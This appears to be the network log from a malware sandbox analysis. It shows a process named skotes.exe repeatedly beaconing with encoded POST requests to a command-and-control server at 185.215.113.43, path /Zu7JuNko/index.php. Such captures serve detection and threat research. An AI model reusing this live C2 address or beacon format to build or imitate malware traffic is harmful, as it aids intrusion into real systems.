Dec 18, 2024 13:40:14.768556118 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:16.108274937 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49930	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:17.904393911 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:19.215270996 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49936	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:20.848927975 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:22.181065083 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49943	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:23.936409950 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:25.382523060 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49952	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:27.030548096 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:28.366455078 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49959	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:30.148252964 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:31.480951071 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	49966	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:33.364618063 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:34.717283010 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	49974	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:36.478370905 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:37.828365088 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	49982	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:39.465861082 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:41.543348074 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	49993	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:43.310424089 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:44.661284924 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	50000	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:46.313746929 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:47.650578022 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	50008	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:49.611469030 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:50.916908026 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	50018	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:52.863015890 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	50026	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:54.621820927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:40:55.969660997 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	50033	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:40:57.614799023 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:40:58.952971935 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:40:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	50041	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:00.716357946 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:02.049977064 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	50049	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:03.684643984 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:05.040505886 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	50057	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:06.858973980 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:08.211086988 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	50062	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:09.872055054 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:11.276518106 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	50063	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:13.047663927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:14.390414000 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	50064	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:16.044992924 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:17.393587112 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	50065	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:19.137867928 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:41:20.486113071 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	50066	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:22.127101898 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:41:23.585735083 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:41:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	50067	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:41:25.341058016 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
